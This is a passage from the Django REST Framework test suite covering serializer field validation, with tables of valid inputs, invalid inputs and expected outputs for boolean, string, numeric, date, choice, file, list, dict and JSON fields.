inputs = (
[],
{},
)
field = serializers.BooleanField()
for input_value in inputs:
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(input_value)
expected = ['"{0}" is not a valid boolean.'.format(input_value)]
assert exc_info.value.detail == expected
class TestNullBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
}
outputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None,
'other': True
}
field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
"""
Valid and invalid values for `CharField`.
"""
valid_inputs = {
1: '1',
'abc': 'abc'
}
invalid_inputs = {
(): ['Not a valid string.'],
True: ['Not a valid string.'],
'': ['This field may not be blank.']
}
outputs = {
1: '1',
'abc': 'abc'
}
field = serializers.CharField()
def test_trim_whitespace_default(self):
field = serializers.CharField()
assert field.to_internal_value(' abc ') == 'abc'
def test_trim_whitespace_disabled(self):
field = serializers.CharField(trim_whitespace=False)
assert field.to_internal_value(' abc ') == ' abc '
def test_disallow_blank_with_trim_whitespace(self):
field = serializers.CharField(allow_blank=False, trim_whitespace=True)
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(' ')
assert exc_info.value.detail == ['This field may not be blank.']
class TestEmailField(FieldValues):
"""
Valid and invalid values for `EmailField`.
"""
valid_inputs = {
'[email protected]': '[email protected]',
' [email protected] ': '[email protected]',
}
invalid_inputs = {
'examplecom': ['Enter a valid email address.']
}
outputs = {}
field = serializers.EmailField()
class TestRegexField(FieldValues):
"""
Valid and invalid values for `RegexField`.
"""
valid_inputs = {
'a9': 'a9',
}
invalid_inputs = {
'A9': ["This value does not match the required pattern."]
}
outputs = {}
field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
"""
Valid and invalid values for `SlugField`.
"""
valid_inputs = {
'slug-99': 'slug-99',
}
invalid_inputs = {
'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
}
outputs = {}
field = serializers.SlugField()
class TestURLField(FieldValues):
"""
Valid and invalid values for `URLField`.
"""
valid_inputs = {
'http://example.com': 'http://example.com',
}
invalid_inputs = {
'example.com': ['Enter a valid URL.']
}
outputs = {}
field = serializers.URLField()
class TestUUIDField(FieldValues):
"""
Valid and invalid values for `UUIDField`.
"""
valid_inputs = {
'825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'urn:uuid:213b7d9b-244f-410d-828c-dabce7a2615d': uuid.UUID('213b7d9b-244f-410d-828c-dabce7a2615d'),
284758210125106368185219588917561929842: uuid.UUID('d63a6fb6-88d5-40c7-a91c-9edf73283072')
}
invalid_inputs = {
'825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.'],
(1, 2, 3): ['"(1, 2, 3)" is not a valid UUID.']
}
outputs = {
uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
}
field = serializers.UUIDField()
def _test_format(self, uuid_format, formatted_uuid_0):
field = serializers.UUIDField(format=uuid_format)
assert field.to_representation(uuid.UUID(int=0)) == formatted_uuid_0
assert field.to_internal_value(formatted_uuid_0) == uuid.UUID(int=0)
def test_formats(self):
self._test_format('int', 0)
self._test_format('hex_verbose', '00000000-0000-0000-0000-000000000000')
self._test_format('urn', 'urn:uuid:00000000-0000-0000-0000-000000000000')
self._test_format('hex', '0' * 32)
class TestIPAddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 or IPv6 address.'],
'127.122.111.2231': ['Enter a valid IPv4 or IPv6 address.'],
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
1000: ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField()
class TestIPv4AddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 address.'],
'127.122.111.2231': ['Enter a valid IPv4 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv4')
class TestIPv6AddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv6')
class TestFilePathField(FieldValues):
"""
Valid and invalid values for `FilePathField`
"""
valid_inputs = {
__file__: __file__,
}
invalid_inputs = {
'wrong_path': ['"wrong_path" is not a valid path choice.']
}
outputs = {
}
field = serializers.FilePathField(
path=os.path.abspath(os.path.dirname(__file__))
)
# Number types...
class TestIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField`.
"""
valid_inputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0,
'1.0': 1
}
invalid_inputs = {
0.5: ['A valid integer is required.'],
'abc': ['A valid integer is required.'],
'0.5': ['A valid integer is required.']
}
outputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0
}
field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
}
invalid_inputs = {
0: ['Ensure this value is greater than or equal to 1.'],
4: ['Ensure this value is less than or equal to 3.'],
'0': ['Ensure this value is greater than or equal to 1.'],
'4': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
"""
Valid and invalid values for `FloatField`.
"""
valid_inputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
invalid_inputs = {
'abc': ["A valid number is required."]
}
outputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
"""
Valid and invalid values for `FloatField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
1.0: 1.0,
3.0: 3.0,
}
invalid_inputs = {
0.9: ['Ensure this value is greater than or equal to 1.'],
3.1: ['Ensure this value is less than or equal to 3.'],
'0.0': ['Ensure this value is greater than or equal to 1.'],
'3.1': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField`.
"""
valid_inputs = {
'12.3': Decimal('12.3'),
'0.1': Decimal('0.1'),
10: Decimal('10'),
0: Decimal('0'),
12.3: Decimal('12.3'),
0.1: Decimal('0.1'),
'2E+1': Decimal('20'),
}
invalid_inputs = (
('abc', ["A valid number is required."]),
(Decimal('Nan'), ["A valid number is required."]),
(Decimal('Inf'), ["A valid number is required."]),
('12.345', ["Ensure that there are no more than 3 digits in total."]),
(200000000000.0, ["Ensure that there are no more than 3 digits in total."]),
('0.01', ["Ensure that there are no more than 1 decimal places."]),
(123, ["Ensure that there are no more than 2 digits before the decimal point."]),
('2E+2', ["Ensure that there are no more than 2 digits before the decimal point."])
)
outputs = {
'1': '1.0',
'0': '0.0',
'1.09': '1.1',
'0.04': '0.0',
1: '1.0',
0: '0.0',
Decimal('1.0'): '1.0',
Decimal('0.0'): '0.0',
Decimal('1.09'): '1.1',
Decimal('0.04'): '0.0'
}
field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField` with min and max limits.
"""
valid_inputs = {
'10.0': Decimal('10.0'),
'20.0': Decimal('20.0'),
}
invalid_inputs = {
'9.9': ['Ensure this value is greater than or equal to 10.'],
'20.1': ['Ensure this value is less than or equal to 20.'],
}
outputs = {}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
min_value=10, max_value=20
)
class TestNoMaxDigitsDecimalField(FieldValues):
field = serializers.DecimalField(
max_value=100, min_value=0,
decimal_places=2, max_digits=None
)
valid_inputs = {
'10': Decimal('10.00')
}
invalid_inputs = {}
outputs = {}
class TestNoStringCoercionDecimalField(FieldValues):
"""
Output values for `DecimalField` with `coerce_to_string=False`.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
1.09: Decimal('1.1'),
0.04: Decimal('0.0'),
'1.09': Decimal('1.1'),
'0.04': Decimal('0.0'),
Decimal('1.09'): Decimal('1.1'),
Decimal('0.04'): Decimal('0.0'),
}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
coerce_to_string=False
)
class TestLocalizedDecimalField(TestCase):
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_internal_value(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_internal_value('1,1'), Decimal('1.1'))
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_representation(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_representation(Decimal('1.1')), '1,1')
def test_localize_forces_coerce_to_string(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, coerce_to_string=False, localize=True)
self.assertTrue(isinstance(field.to_representation(Decimal('1.1')), six.string_types))
class TestQuantizedValueForDecimal(TestCase):
def test_int_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value(12).as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_part_precision_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12.0').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
class TestNoDecimalPlaces(FieldValues):
valid_inputs = {
'0.12345': Decimal('0.12345'),
}
invalid_inputs = {
'0.1234567': ['Ensure that there are no more than 6 digits in total.']
}
outputs = {
'1.2345': '1.2345',
'0': '0',
'1.1': '1.1',
}
field = serializers.DecimalField(max_digits=6, decimal_places=None)
# Date & time serializers...
class TestDateField(FieldValues):
"""
Valid and invalid values for `DateField`.
"""
valid_inputs = {
'2001-01-01': datetime.date(2001, 1, 1),
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
}
invalid_inputs = {
'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
'2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
}
outputs = {
datetime.date(2001, 1, 1): '2001-01-01',
'2001-01-01': '2001-01-01',
six.text_type('2016-01-10'): '2016-01-10',
None: None,
'': None,
}
field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
"""
Valid and invalid values for `DateField` with a custom input format.
"""
valid_inputs = {
'1 Jan 2001': datetime.date(2001, 1, 1),
}
invalid_inputs = {
'2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
"""
Values for `DateField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): '01 Jan 2001'
}
field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
"""
Values for `DateField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
}
field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField`.
"""
valid_inputs = {
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
# Django 1.4 does not support timezone string parsing.
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC())
}
invalid_inputs = {
'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
'2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z',
'2001-01-01T00:00:00': '2001-01-01T00:00:00',
six.text_type('2016-01-10T00:00:00'): '2016-01-10T00:00:00',
None: None,
'': None,
}
field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with a custom input format.
"""
valid_inputs = {
'1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
}
field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
}
field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with naive datetimes.
"""
valid_inputs = {
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
}
invalid_inputs = {}
outputs = {}
field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
"""
Valid and invalid values for `TimeField`.
"""
valid_inputs = {
'13:00': datetime.time(13, 00),
datetime.time(13, 00): datetime.time(13, 00),
}
invalid_inputs = {
'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
'99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
}
outputs = {
datetime.time(13, 0): '13:00:00',
datetime.time(0, 0): '00:00:00',
'00:00:00': '00:00:00',
None: None,
'': None,
}
field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
"""
Valid and invalid values for `TimeField` with a custom input format.
"""
valid_inputs = {
'1:00pm': datetime.time(13, 00),
}
invalid_inputs = {
'13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
}
outputs = {}
field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): '01:00PM'
}
field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): datetime.time(13, 00)
}
field = serializers.TimeField(format=None)
class TestDurationField(FieldValues):
"""
Valid and invalid values for `DurationField`.
"""
valid_inputs = {
'13': datetime.timedelta(seconds=13),
'3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
'08:01': datetime.timedelta(minutes=8, seconds=1),
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
3600: datetime.timedelta(hours=1),
}
invalid_inputs = {
'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
'3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
}
outputs = {
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
}
field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
"""
Valid and invalid values for `ChoiceField`.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'amazing': ['"amazing" is not a valid choice.']
}
outputs = {
'good': 'good',
'': '',
'amazing': 'amazing',
}
field = serializers.ChoiceField(
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.ChoiceField(
allow_blank=True,
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
output = field.run_validation('')
assert output == ''
def test_allow_null(self):
"""
If `allow_null=True` then '' on HTML forms is treated as None.
"""
field = serializers.ChoiceField(
allow_null=True,
choices=[
1, 2, 3
]
)
field.field_name = 'example'
value = field.get_value(QueryDict('example='))
assert value is None
output = field.run_validation(None)
assert output is None
def test_iter_options(self):
"""
iter_options() should return a list of options and option groups.
"""
field = serializers.ChoiceField(
choices=[
('Numbers', ['integer', 'float']),
('Strings', ['text', 'email', 'url']),
'boolean'
]
)
items = list(field.iter_options())
assert items[0].start_option_group
assert items[0].label == 'Numbers'
assert items[1].value == 'integer'
assert items[2].value == 'float'
assert items[3].end_option_group
assert items[4].start_option_group
assert items[4].label == 'Strings'
assert items[5].value == 'text'
assert items[6].value == 'email'
assert items[7].value == 'url'
assert items[8].end_option_group
assert items[9].value == 'boolean'
class TestChoiceFieldWithType(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses an integer type,
instead of a char type.
"""
valid_inputs = {
'1': 1,
3: 3,
}
invalid_inputs = {
5: ['"5" is not a valid choice.'],
'abc': ['"abc" is not a valid choice.']
}
outputs = {
'1': 1,
1: 1
}
field = serializers.ChoiceField(
choices=[
(1, 'Poor quality'),
(2, 'Medium quality'),
(3, 'Good quality'),
]
)
class TestChoiceFieldWithListChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a flat list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestChoiceFieldWithGroupedChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a grouped list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
('medium', 'Medium quality'),
),
),
('good', 'Good quality'),
]
)
class TestChoiceFieldWithMixedChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a single paired or
grouped.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
),
),
'medium',
('good', 'Good quality'),
]
)
class TestMultipleChoiceField(FieldValues):
"""
Valid and invalid values for `MultipleChoiceField`.
"""
valid_inputs = {
(): set(),
('aircon',): set(['aircon']),
('aircon', 'manual'): set(['aircon', 'manual']),
}
invalid_inputs = {
'abc': ['Expected a list of items but got type "str".'],
('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
}
outputs = [
(['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
]
field = serializers.MultipleChoiceField(
choices=[
('aircon', 'AirCon'),
('manual', 'Manual drive'),
('diesel', 'Diesel'),
]
)
def test_against_partial_and_full_updates(self):
field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
field.partial = False
assert field.get_value(QueryDict({})) == []
field.partial = True
assert field.get_value(QueryDict({})) == rest_framework.fields.empty
class TestEmptyMultipleChoiceField(FieldValues):
"""
Invalid values for `MultipleChoiceField(allow_empty=False)`.
"""
valid_inputs = {
}
invalid_inputs = (
([], ['This selection may not be empty.']),
)
outputs = [
]
field = serializers.MultipleChoiceField(
choices=[
('consistency', 'Consistency'),
('availability', 'Availability'),
('partition', 'Partition tolerance'),
],
allow_empty=False
)
# File serializers...
class MockFile:
def __init__(self, name='', size=0, url=''):
self.name = name
self.size = size
self.url = url
def __eq__(self, other):
return (
isinstance(other, MockFile) and
self.name == other.name and
self.size == other.size and
self.url == other.url
)
class TestFileField(FieldValues):
"""
Values for `FileField`.
"""
valid_inputs = [
(MockFile(name='example', size=10), MockFile(name='example', size=10))
]
invalid_inputs = [
('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
(MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
(MockFile(name='', size=10), ['No filename could be determined.']),
(MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
]
outputs = [
(MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
('', None)
]
field = serializers.FileField(max_length=10)
class TestFieldFieldWithName(FieldValues):
"""
Values for `FileField` with a filename output instead of URLs.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = [
(MockFile(name='example.txt', url='/example.txt'), 'example.txt')
]
field = serializers.FileField(use_url=False)
# Stub out mock Django `forms.ImageField` class so we don't *actually*
# call into it's regular validation, or require PIL for testing.
class FailImageValidation(object):
def to_python(self, value):
raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
def to_python(self, value):
return value
class TestInvalidImageField(FieldValues):
"""
Values for an invalid `ImageField`.
"""
valid_inputs = {}
invalid_inputs = [
(MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
]
outputs = {}
field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
"""
Values for an valid `ImageField`.
"""
valid_inputs = [
(MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
]
invalid_inputs = {}
outputs = {}
field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
"""
Values for `ListField` with IntegerField as child.
"""
valid_inputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3]),
([], [])
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
([1, 2, 'error'], ['A valid integer is required.']),
({'one': 'two'}, ['Expected a list of items but got type "dict".'])
]
outputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
field = serializers.ListField(child=serializers.IntegerField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.ListField(child=serializers.IntegerField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_collection_types_are_invalid_input(self):
field = serializers.ListField(child=serializers.CharField())
input_value = ({'one': 'two'})
with pytest.raises(serializers.ValidationError) as exc_info:
field.to_internal_value(input_value)
assert exc_info.value.detail == ['Expected a list of items but got type "dict".']
class TestEmptyListField(FieldValues):
"""
Values for `ListField` with allow_empty=False flag.
"""
valid_inputs = {}
invalid_inputs = [
([], ['This list may not be empty.'])
]
outputs = {}
field = serializers.ListField(child=serializers.IntegerField(), allow_empty=False)
class TestUnvalidatedListField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
]
outputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
field = serializers.ListField()
class TestDictField(FieldValues):
"""
Values for `ListField` with CharField as child.
"""
valid_inputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
invalid_inputs = [
({'a': 1, 'b': None}, ['This field may not be null.']),
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.DictField(child=serializers.CharField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.DictField(allow_null=True)
output = field.run_validation(None)
assert output is None
class TestDictFieldWithNullChild(FieldValues):
"""
Values for `ListField` with allow_null CharField as child.
"""
valid_inputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
invalid_inputs = [
]
outputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField(allow_null=True))
class TestUnvalidatedDictField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
]
invalid_inputs = [
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
]
field = serializers.DictField()
class TestJSONField(FieldValues):
"""
Values for `JSONField`.
"""
valid_inputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
({'a': set()}, ['Value must be valid JSON.']),
]
outputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}),
]
field = serializers.JSONField()
class TestBinaryJSONField(FieldValues):
"""
Values for `JSONField` with binary=True.
"""
valid_inputs = [
(b'{"a": 1, "3": null, "b": ["some", "list", true, 1.23]}', {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
('{"a": "unterminated string}', ['Value must be valid JSON.']),
]
outputs = [
(['some', 'list', True, 1.23], b'["some", "list", true, 1.23]'),
]
field = serializers.JSONField(binary=True)
# Tests for FieldField.
# ---------------------
class MockRequest:
def build_absolute_uri(self, value):
return 'http://example.com' + value
class TestFileFieldContext:
def test_fully_qualified_when_request_in_context(self):
field = serializers.FileField(max_length=10)
field._context = {'request': MockRequest()}
obj = MockFile(name='example.txt', url='/example.txt')
value = field.to_representation(obj)
assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
def test_serializer_method_field(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField()
def get_example_field(self, obj):
return 'ran get_example_field(%d)' % obj['example_field']
serializer = ExampleSerializer({'example_field': 123})
assert serializer.data == {
'example_field': 'ran get_example_field(123)'
}
def test_redundant_method_name(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField('get_example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `get_example_field` on "
"SerializerMethodField 'example_field' in serializer "
"'ExampleSerializer', because it is the same as the default "
"method name. Remove the `method_name` argument."
)
| bsd-2-clause |
